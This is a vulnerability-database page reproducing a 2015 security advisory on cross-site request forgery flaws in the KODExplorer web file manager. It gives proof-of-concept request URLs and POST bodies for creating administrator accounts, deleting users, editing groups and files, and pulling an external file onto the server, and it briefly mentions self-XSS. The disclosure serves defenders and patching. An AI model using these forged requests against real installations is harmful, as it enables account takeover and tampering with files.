Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KODExplorer 3.21 Cross Site Request Forgery

🗓️ 31 Dec 2015 00:00:00Reported by Ben khlifa FahmiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

KODExplorer 3.21 CSRF without token protection. Attacker can add, edit, remove users & manipulate file management, user group with CSRF

Code
`  
================================================================================  
# KODExplorer web file manager - Cross Site Request Foreign  
================================================================================  
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/  
# Date: 30-Dec-2015  
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip  
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt  
================================================================================  
Description : there is no CSRF token protection on the user management area , an attacker can use the  
POC bellow to add , edit , remove any user by sending a link to logged in user with User Management privilege  
  
# PoC :  
Add user :  
http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator  
  
Delete User:  
http://localhost/index.php?member/del&name=[username]  
  
Edit User:  
http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password]  
  
Patch released : Check my git https://github.com/benkhlifafahmi/KODExplorer  
================================================================================  
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)  
================================================================================  
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group  
  
  
  
Additional CSRF Issues:  
  
I - CSRF Group Managment :  
Description : an attacker can add , remove or edit any User Group by sending an exploit link to a loggeed in admin.  
  
Vulnerable Controller : group.class.php  
Proof of Concept :   
#Add Group : POST Request   
action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]  
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1  
  
#Edit Group : POST Request   
action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]  
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1  
  
#Delete Group : http://localhost/index.php?group/del&role=[group_name]  
  
  
------------------------------------------------------------------------  
II - CSRF on File Managment :   
Description : an attacker can add , upload file from external site , delete or edit file/path by sending a link to a logged in administrator.  
  
Vulnerable Controller : explorer.class.php  
  
Proof of Concept :   
#Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name]  
#Delete file : POST Request   
action URL: http://localhost/index.php?explorer/pathDelete  
post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]  
#Upload File(2): http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]  
  
#Edit file : POST Request  
action URL:POST http://localhost/index.php?editor/fileSave   
Post Data: path[path to file]\ncharset[utf-8]\nfilestr[[file content]]  
  
  
------------------------------------------------------------------------  
  
  
  
III - CSRF on App Managment :   
Description : an attacker can add, edit , remove any app by sending a link to a logged in admin.  
  
Vulnerable Controller : app.class.php  
  
Proof of Concept :   
#Add app : POST request  
action url : http://localhost/index.php?app/add&name=a  
POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[you app name]%2522%252C%2522desc%2522%253A%2522[you app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]  
  
#Delete App : http://localhost/index.php?app/del&name=[your app]  
  
  
-------------------------------------------------------------------------  
IV - Multiple Self XSS:  
Description : the KODExplorer suffer from many Self XSS, vulnerable module to XSS are , Username , App Name , App Source , Folder Name , File Name , Group Name. to execute it just inject html code as one of the vulnerable module above.  
  
  
-------------------------------------------------------------------------  
V - Solution :   
I have released a fix on my github account you can clone it or just wait for a patch to be released on the next version as i have reported all possible vulnerability ,  
  
-------------------------------------------------------------------------  
  
  
Thanks : I want to say "thank you" for:  
- Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn  
- Arab Oracle Users Group (@araboug) http://www.araboug.org  
- @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.  
Special Greetz to my fiancy.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Dec 2015 00:00Current
0.5Low risk
Vulners AI Score0.5
csrf protection missinguser managementfile management manipulationgroup managementfile uploadsecurity vulnerability
40